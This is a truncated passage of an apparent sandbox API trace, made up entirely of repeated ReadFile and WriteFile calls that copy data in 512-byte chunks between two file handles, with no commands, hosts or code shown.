lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.321] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.329] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.331] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.335] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.343] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.345] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.346] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.347] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.348] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.348] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.351] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.354] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.358] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.364] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.367] WriteFile (in: hFile=0x2b4, 